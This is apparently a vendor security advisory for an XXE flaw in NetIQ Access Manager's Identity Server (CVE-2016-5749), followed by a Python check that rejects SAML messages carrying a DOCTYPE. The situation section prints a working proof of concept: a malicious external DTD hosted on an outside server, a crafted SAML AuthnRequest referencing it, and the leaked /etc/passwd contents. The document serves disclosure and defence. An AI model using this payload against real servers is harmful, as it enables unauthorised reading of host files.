Access Manager Identity Server XXE vulnerability parsing incoming XML requests with DTD file referenced (CVE-2016-5749)

  • 7017806
  • 04-Jul-2016
  • 29-Aug-2016

Environment

NetIQ Access Manager 4.2
NetIQ Access Manager 4.1
CVE-2016-5749

Situation

When the NAM Identity Server parses an incoming XML request, a number of validations take place depending on the configuration, e.g. certificate and signature validations. If no such checks are enabled and the Identity Server processes an unauthenticated request such as a SAML AuthnRequest, it is possible to inject into the request a reference to an external DTD file, which can then be used to read any readable file on the host system.

As an example:

a) Create a custom DTD file with the following content and place it on a public web server:

<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 '<!ENTITY &#37; external SYSTEM "file:///nothere/%payload;">'>
%param1; %external;

b) POST the following SAMLRequest to a NAM 4.2 Identity Server. Note the DOCTYPE entry pointing to the custom file (named combine.dtd) created in step a) above:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo SYSTEM "http://147.2.16.248/ff/combine.dtd">
<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
                    xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
                    ID="_30c09a71e0f6114bca62b83fa8a0ef8c5c4c96eb9d"
                    Version="2.0"
                    IssueInstant="2016-05-24T08:20:52Z"
                    Destination="https://nam42sba.lab.novell.com/nidp/saml2/sso"
                    AssertionConsumerServiceURL="http://simplesaml109.lab.novell.com/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp"
                    ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST">
  <saml:Issuer>http://simplesaml109.lab.novell.com/</saml:Issuer>
  <samlp:NameIDPolicy Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient" AllowCreate="true"/>
  <samlp:RequestedAuthnContext>
    <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>
  </samlp:RequestedAuthnContext>
</samlp:AuthnRequest>

c) Verify that the contents of /etc/passwd are reported in the browser, as shown below:

NAM42SBA Access Manager Landing Page
Unable to complete request at this time. (/nothere/at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
haldaemon:x:101:102:User for haldaemon:/var/run/hald:/bin/false
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
messagebus:x:100:101:User for D-Bus:/var/run/dbus:/bin/false
mysql:x:60:107:MySQL database admin:/var/lib/mysql:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
ntp:x:74:109:NTP daemon:/var/lib/ntp:/bin/false
polkituser:x:105:108:PolicyKit:/var/run/PolicyKit:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
puppet:x:104:106:Puppet daemon:/var/lib/puppet:/bin/false
root:x:0:0:root:/root:/bin/bash
sshd:x:102:103:SSH daemon:/var/lib/sshd:/bin/false
suse-ncc:x:106:111:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
uuidd:x:103:105:User for uuidd:/var/run/uuidd:/bin/false
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
config:x:1000:1000::/home/config:/bin/nash
novlwww:x:107:112:Novell System User:/var/opt/novell/novlwww:/bin/bash
novlagscd:x:108:1001:novell-agscd System User:/var/opt/novell/ag/sc:/bin/false
activemqd:x:109:114:novell-activemq System User:/var/opt/novell/activemq:/bin/false (No such file or directory)-28142828381AE11D)

Resolution

Apply NAM 4.2.2 for the NAM 4.2 release, or NAM 4.1.2 HF 1 for the NAM 4.1 release.

To work around the issue, make sure that signature validation is enabled on the Identity Server for all trusted Service Providers.
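Independently of the product fix, the parser boundary itself can refuse the DTD constructs this issue depends on: a legitimate SAML message never carries a DOCTYPE, so a pre-parse check that aborts on one stops the external DTD from ever being fetched. The following Python is an added illustration and not NetIQ code; it uses the standard-library expat parser, and the sample request, its hostnames and the attacker.example DTD address are constructed.

```python
import xml.parsers.expat


class UnsafeSamlRequest(Exception):
    """Raised when a SAML message carries a DOCTYPE or external entity."""


def inspect_saml_request(raw: bytes) -> dict:
    """Parse with expat, aborting at the first DTD construct.

    The parse stops at the DOCTYPE declaration itself, before any external
    DTD or entity could be resolved; a clean message yields its root element.
    """
    parser = xml.parsers.expat.ParserCreate()
    result = {}

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeSamlRequest(f"DOCTYPE {name!r} (SYSTEM {sysid!r})")

    def on_external_ref(context, base, sysid, pubid):
        # Second line of defence: only reachable if a DTD got past on_doctype.
        raise UnsafeSamlRequest(f"external entity {sysid!r}")

    def on_start(name, attrs):
        result.setdefault("root", name)   # record the root element only
        result.setdefault("attrs", attrs)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    parser.Parse(raw, True)
    return result


def classify(raw: bytes) -> str:
    """Return an accept/reject verdict for one raw request body."""
    try:
        info = inspect_saml_request(raw)
        return f"accepted {info['root']} ID={info['attrs'].get('ID')}"
    except UnsafeSamlRequest as exc:
        return f"rejected: {exc}"


# Constructed sample shaped like the advisory's request; the DTD host is a
# placeholder, not the address used in the write-up.
DOCTYPE = b'<!DOCTYPE foo SYSTEM "http://attacker.example/combine.dtd">'
XXE_REQUEST = (
    b'<?xml version="1.0" encoding="UTF-8"?>' + DOCTYPE +
    b'<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"'
    b' ID="_example" Version="2.0" Destination="https://idp.example/nidp/saml2/sso">'
    b'<samlp:NameIDPolicy AllowCreate="true"/></samlp:AuthnRequest>'
)
CLEAN_REQUEST = XXE_REQUEST.replace(DOCTYPE, b"")
```

Run classify() on both constants: the DOCTYPE variant is rejected at the declaration without any network or file access, while the clean variant parses and reports its root element and ID.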
